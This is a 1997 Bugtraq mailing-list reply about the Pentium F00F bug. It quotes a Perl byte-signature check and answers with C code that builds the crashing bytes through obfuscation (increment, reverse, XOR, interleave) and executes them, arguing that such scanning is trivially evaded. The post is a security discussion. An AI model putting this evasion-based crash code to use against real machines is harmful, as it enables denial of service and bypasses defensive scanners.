[5545] in bugtraq
Re: Intel Pentium Bug
daemon@ATHENA.MIT.EDU (Kragen \"Skewed\" Sitaker)
Mon Nov 10 18:59:36 1997
Date: Mon, 10 Nov 1997 07:35:16 -0500
Reply-To: "Kragen \"Skewed\" Sitaker" <kragen@DNACO.NET>
From: "Kragen \"Skewed\" Sitaker" <kragen@DNACO.NET>
X-To: Jason Parsons <root@SAFFRONCS.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.LNX.3.95.971109193537.3288A-100000@cayenne.saffroncs.com>
On Sun, 9 Nov 1997, Jason Parsons wrote:
> Re the F0 0F C7 C8 Pentuim bug:
>
> I just wanted ot repost this from the Linux-security list. Thought it
> might be helpful to some here. This was posted to Linux-security by Sam
> Trenholme <set@reality.samiam.org>.
> if($data =~ /\xf0\x0f\xc7\xc8/) {
> print "$dir/$file contains F0 0F C7 C8\n";
> }
Is this intended to keep malicious people from crashing your computer?
It is trivial to defeat this, and it is impossible, in the general case,
to determine whether or not a program can compute f0 0f c7 c8 and execute
it.
Here are some trivial examples of ways to defeat it:
/*
* Demonstrate a trivial way to crash a Pentium, f0 0f c7 c8
*/
#include <string.h>
char incr[] = "\xf1\x10\xc8\xc9";
void
fix_incr (char *s) {
for (; *s; s++) --*s;
}
char backwards[] = "\xc8\xc7\x0f\xf0";
void
reverse_inner(char *begin, char *end) {
while (end > begin) {
char t = *end;
*end = *begin;
*begin = t;
end--;
begin++;
}
}
void
reverse(char *s) {
reverse_inner(s, s+strlen(s)-1);
}
char xored[] = "\xf1\x0e\xc9\xc8";
void
xor_pad (char *s, char pad) {
for (; *s; s++) *s ^= pad;
}
char interleaved[] = { 'X', '\xf0', 'Y', '\x0f', 'Z', '\xc7', 'A', '\xc8',
'\0'};
void
deinterleave (char *s) {
char *t = s + 1;
for (; *t; t++, t++, s++) *s = *t;
}
int
main() {
void (*f)();
fix_incr(incr);
reverse(backwards);
xor_pad(xored, 1);
deinterleave(interleaved);
f = incr; /* or backwards, or xored, or interleaved */
(*f)();
}
Now, none of these are very subtle. I could easily write something that
contained a piece of nonsense text, took the second-to-last bit from each
character, and assembled f1 0e c9 c8 from it. The possibilities are
endless.
A trusted-compiler system seems to be the only possible software
protection against attacks like these.
Kragen
